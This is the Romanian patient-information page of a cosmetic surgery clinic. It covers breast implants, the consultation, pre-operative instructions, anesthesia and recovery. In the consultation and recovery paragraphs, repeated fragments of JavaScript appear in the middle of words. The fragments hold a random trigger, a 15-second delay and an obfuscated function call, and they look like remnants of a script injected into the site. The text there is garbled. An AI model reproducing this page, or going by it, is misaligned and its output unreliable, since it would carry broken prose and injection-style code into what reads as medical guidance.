surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Inainte de operatie

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Consultatia reprezinta  inceputul actului terapeutic, este un timp esential si delicat atat pentru chirurgul plastician cat si pentru viitorul pacient.
In timpul consultatiei se creaza echipa medic-pacient si  se va pune baza viitorului plan terapeutic in functie de dorintele dumneavoastra si ajutat de sfatul si experienta specialistului, astfel incat rezultatul final sa fie cel la care visati.
Planul chirurgical va fi individualizat pentru a se adresa nevoilor si obiectivelor  dumneavoastra personale.

Consultatia initiala va decurge ca o discutie libera in care chirurgul plastician va va informa despre caracteristicile interventiei de chirurgie estetica pe care o solicitati precum si despre posibilele alternative sau asocieri de procedee terapeutice.
Veti primi raspunsuri detaliate asupra problemelor care va preocupa si veti fi informat asupra algoritmului terapeutic de la inceput si pana la recuperarea finala.
In continuare, veti informa chirurgul plastician asupra posibilelor probleme de sanatate si vi se va efectua un examen clinic general si al zonelor de interes.
Vi se vor prezenta cazuri similare cu al dumneavoastra inainte si dupa operatie ajutandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andu-va astfel sa aveti o imagine cat mai corecta asupra viitorului rezultat.

In ziua operatiei

Va trebui sa evitati consumul de alcool si tutun cel putin 48 de ore inainte de-a intra in sala de operatie.
Trebuie sa intrerupeti cu o luna inainte administrarea de anticonceptionale.
Va rugam sa evitati consumul de aspirina sau compusi echivalenti deoarece pot

declansa sangerari si altereaza procesul de coagulare. Va prezentati la clinica cu Cartea de Identitate si daca este posibil sa fiti insotita de cineva apropiat.

,,Bagajul,, consta in:

-pijamale din 2 piese cu deschiderea nasturilor in fata
-obiecte de igiena personala: pasta si periuta de dinti, servetele umede, etc.
-evitati fardurile, unghiile reconstruite, ruj, etc.
In ziua interventiei nu mancati si nu beti nimic cu minim 6 ore inainte de operatie.
Va rugam sa avertizati personalul medical daca purtati proteza dentara sau lentile de contact.
Va prezentati in clinica la data si ora stabilita in prealabil la consultatie. Veti fi primit de personalul medical care va conduce in salonul rezervat pentru dumneavoastra.
Se intocmesc:
•    fisa de internare
•    diagnosticul de internare
•    consultul medical al starii prezente de sanatate.
Preoperator veti fi  vizitat de medicul anestezist si de chirurg cu echipa operatorie pentru completarea starii medicale prezente prin intrebari si raspunsuri de ambele parti.
Chirurgul plastician va  desena planul operator acolo unde trebuie intervenit in timpul operatiei.
Se efectueaza utimul consult de catre medicul anestezist. Pacientul va anunta medicul anestezist despre purtarea de proteze dentare, lentile de contact sau alte proteze.


Anestezia
In general, pentru siguranta si comfortul dumneavoastra, interventia de chirurgie plastica se realizeaza sub anestezie generala. In cazuri selectate este posibila folosirea anesteziei locale asistate.

Interventia chirurgicala
Interventia se va desfasura in sala operatorie complet dotata si in conditii chirurgicale stricte.
Cicatricile care vor rezulta sunt mici, ascunse si nu pun probleme din punct de vedere estetic.

Posibile complicatii
In general, in conditiile in care interventiile de chirurgie plastica sunt efectuate in conditii operatorii adecvate, de catre un chirurg plastician cu experienta, complicatiile dupa sunt rare si de obicei minore.

Revenirea la normal
Dupa operatie veti purta un garment special  sau o bustiera alese pentru dumneavoastra inainte de interventie, impreuna cu chirurgul plastician in functie de operatia estetica la care va supuneti. Durata recomandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andata este intre 3-6 saptamani.
Mobilizarea se va incepe cat mai curandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and, activitatile obisnuite fiind posibile dupa 24-72 ore, in functie de amploarea interventiei. Activitatea de birou se poate relua dupa 5-7zile iar cele solicitante fizic dupa aproximativ 1 luna.

Dureri
Discomfortul local poate fi minim sau accentuat, in functie de sensibilitatea personala.
Efectul interventiei este vizibil dar rezultatul final apare in timp.
Dupa aceasta perioada, pacientul resimte doar o stare de tensiune la nivelul zonei operate care se remite in 24-48 ore. Este posibila aparitia de dureri dar acestea sint reduse ca intensitate si cedeaza rapid la analgezice. In toata aceasta perioada pacientul se afla la patul postoperator sub controlul atent al asistentei si eventual al medicului anestezist.

Expunerea la soare este interzisa pana la disparitia completa a echimozelor
Veti putea face dus din a doua sau a treia zi.
Alte indicatii le veti primi de la chirurgul plastician care a efectuat  operatia in functie de zona unde sa actionat chirurgical.

Suna Acum!
Navigheaza!